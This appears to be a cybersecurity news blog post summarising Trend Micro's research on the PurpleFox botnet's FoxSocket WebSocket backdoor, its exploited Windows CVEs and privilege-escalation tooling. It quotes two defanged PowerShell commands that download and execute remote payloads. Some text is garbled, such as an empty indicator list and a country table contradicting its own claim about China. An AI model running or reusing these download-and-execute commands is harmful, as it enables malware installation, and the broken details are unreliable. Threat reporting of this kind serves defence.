According to researchers, the new variant uses WebSockets to implement more secure C2 bidirectional communication and its operators have incorporated new exploits and payloads.TrendMicro researchers have explained about the PurpleFox botnet’s latest evolution. The specialists uncovered a new.NET backdoor is otherwise known as FoxSocket, that is closely linked to the PurpleFox operation.

 Trend Micro is a long script that comprises three privilege escalation components.These target Windows 7 to Windows 10 systems, but are limited to 64-bit systems only.

The flaws that are exploited by the latest PurpleFox  with the following:

  • Windows 7/Windows Server 2008 – CVE-2020-1054, CVE-2019-0808 
  • Windows 8/Windows Server 2012 – CVE-2019-1458 
  • Windows 10/Windows Server 2019 – CVE-2021-1732

The configuration parameters for deploying this backdoor had a low number of subdomains to contact the C&C servers in the early iterations, agreeing with the creation data of the malicious domain advb9fyxlf2v[.]com, compared to the latest one.

purplefox botnet

“After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.” reads the analysis published by TrendMicro. “The goal is to install the MSI package as an admin without any user interaction.

The list of WebSocket commands observed by TrendMicro is extensive, and although there are some discrepancies between different variants, the table below summarizes them

Overview of WebSocket commands


PowerShell commands being executed:

  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//[[:]]17881/0CFA042F.Png”
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//[:]13405/57BC9B7E.Png’);MsiMake http[:]//[:]13405/0CFA042F.Png”

These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China:

CountryServer count
United States26

The fetched payload is a long script consisting of three components:

  1. Tater (Hot Potato – privilege escalation)
  2. PowerSploit
  3. Embedded exploit bundle binary (privilege escalation)

Finally they concluded that, PurpleFox’s rootkit tools allow it to carry out its goals in a more stealthy manner. They enable PurpleFox to remain on impacted systems and deliver more payloads to them. We’re still keeping an eye on these new varieties and their payloads. The new.NET WebSocket backdoor (dubbed FoxSocket and detected as Backdoor.MSIL.PURPLEFOX.AA) is being intensively monitored in order to learn more about this threat actor’s aims and goals.

Indicators of compromise:





IP Address

–-For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1, Linkedin handle @linkedin

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s